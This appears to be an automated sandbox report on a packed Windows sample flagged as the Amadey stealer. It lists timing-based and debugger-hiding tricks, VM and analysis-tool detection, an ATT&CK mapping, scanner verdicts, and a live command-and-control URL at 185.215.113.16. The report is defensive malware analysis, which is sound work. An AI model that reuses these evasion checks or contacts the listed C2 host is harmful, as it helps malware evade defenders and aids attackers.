Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538025D second address: 5380282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648BC9AD8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380282 second address: 5380286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380286 second address: 538028C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538028C second address: 5380292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380292 second address: 5380296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380296 second address: 538029A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538029A second address: 5380305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD648BC9AD2h 0x00000010 sub eax, 4181B8E8h 0x00000016 jmp 00007FD648BC9ACBh 0x0000001b popfd 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD648BC9ACBh 0x00000026 jmp 00007FD648BC9AD3h 0x0000002b popfd 0x0000002c mov di, cx 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD648BC9AD1h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330063 second address: 5330069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330069 second address: 5330096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648BC9AD7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330096 second address: 53300B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B458h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov esi, 7598C707h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53300B9 second address: 5330106 instructions: 0x00000000 rdtsc 0x00000002 mov ax, CCA3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d mov di, si 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov ax, 76EFh 0x00000018 pushfd 0x00000019 jmp 00007FD648BC9AD4h 0x0000001e and ax, D918h 0x00000023 jmp 00007FD648BC9ACBh 0x00000028 popfd 0x00000029 popad 0x0000002a and esp, FFFFFFF8h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov eax, edi 0x00000032 mov edx, 7863D292h 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330106 second address: 533013B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B458h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov esi, 1CEB90FDh 0x00000010 mov ecx, 3AE53FF9h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov eax, 49432197h 0x0000001f mov edx, eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533013B second address: 5330163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b jmp 00007FD648BC9ACDh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD648BC9ACDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330163 second address: 53301D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648C0B457h 0x00000009 and cl, FFFFFFAEh 0x0000000c jmp 00007FD648C0B459h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD648C0B450h 0x00000018 xor cx, E428h 0x0000001d jmp 00007FD648C0B44Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD648C0B454h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53301D7 second address: 5330227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD648BC9AD9h 0x00000011 mov ebx, dword ptr [ebp+10h] 0x00000014 jmp 00007FD648BC9ACEh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD648BC9AD7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330227 second address: 5330298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FD648C0B44Bh 0x0000000b or ecx, 43EC4D8Eh 0x00000011 jmp 00007FD648C0B459h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FD648C0B451h 0x00000020 xchg eax, esi 0x00000021 jmp 00007FD648C0B44Eh 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD648C0B457h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330298 second address: 533029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533029E second address: 53302C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648C0B455h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53302C7 second address: 53302CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53302CD second address: 53302D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53302D1 second address: 5330332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD648BC9AD9h 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ch, dh 0x00000017 pushfd 0x00000018 jmp 00007FD648BC9AD4h 0x0000001d add eax, 39D0CBE8h 0x00000023 jmp 00007FD648BC9ACBh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330332 second address: 5330362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 jmp 00007FD648C0B450h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 mov di, si 0x00000015 popad 0x00000016 je 00007FD6BA809708h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop eax 0x00000021 movsx ebx, cx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330362 second address: 5330368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330368 second address: 533036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533036C second address: 5330399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD648BC9ACDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5330399 second address: 53303A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B44Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53303A9 second address: 53303AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53303AD second address: 53303C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD6BA8096BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD648C0B44Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53303C7 second address: 53303CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53303CD second address: 53303D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F3EAE1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F3EBC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 117CF8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: B8EAE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: B8EBC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: DCCF8F instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053A00B6 rdtsc

0_2_053A00B6

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1092	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 395	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1186	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1213	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1199	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3872	Thread sleep time: -56028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2076	Thread sleep count: 1092 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2076	Thread sleep time: -2185092s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4308	Thread sleep count: 395 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4308	Thread sleep time: -11850000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2492	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1004	Thread sleep count: 1186 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1004	Thread sleep time: -2373186s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5716	Thread sleep count: 1213 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5716	Thread sleep time: -2427213s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300	Thread sleep count: 1199 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300	Thread sleep time: -2399199s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300	Thread sleep count: 147 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300	Thread sleep time: -294147s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000003.1758359905.0000000001620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axplong.exe, 00000006.00000002.2995896267.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1783920297.00000000010CD000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1813170144.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1813562303.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_053C0B79 Start: 053C0C18 End: 053C0BB8

6_2_053C0B79

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053A00B6 rdtsc

0_2_053A00B6

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B5645B mov eax, dword ptr fs:[00000030h]		6_2_00B5645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00B5A1C2 mov eax, dword ptr fs:[00000030h]		6_2_00B5A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: 9Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00B3D312 cpuid

6_2_00B3D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00B3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_00B3CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1812692273.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1772376419.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1742866019.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1813406382.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2324708370.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1771741523.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1783849265.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	53%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	53%	ReversingLabs	Win32.Packed.Themida

Source	Detection	Scanner	Label	Link
http://185.215.113.16/Jo89Ku7d/index.php	100%	URL Reputation	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
241.42.69.40.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	URL Reputation: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://185.215.113.16/Jo89Ku7d/index.php.	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpm	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php4079-b30a-7368302a1ad4LMEMp	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpj	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php)	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpI	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpi	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpd	axplong.exe, 00000006.00000002.2995896267.0000000001357000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedBB	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpa	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php?	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php=	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.php6B	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://185.215.113.16/Jo89Ku7d/index.phpded	axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	true	unknown
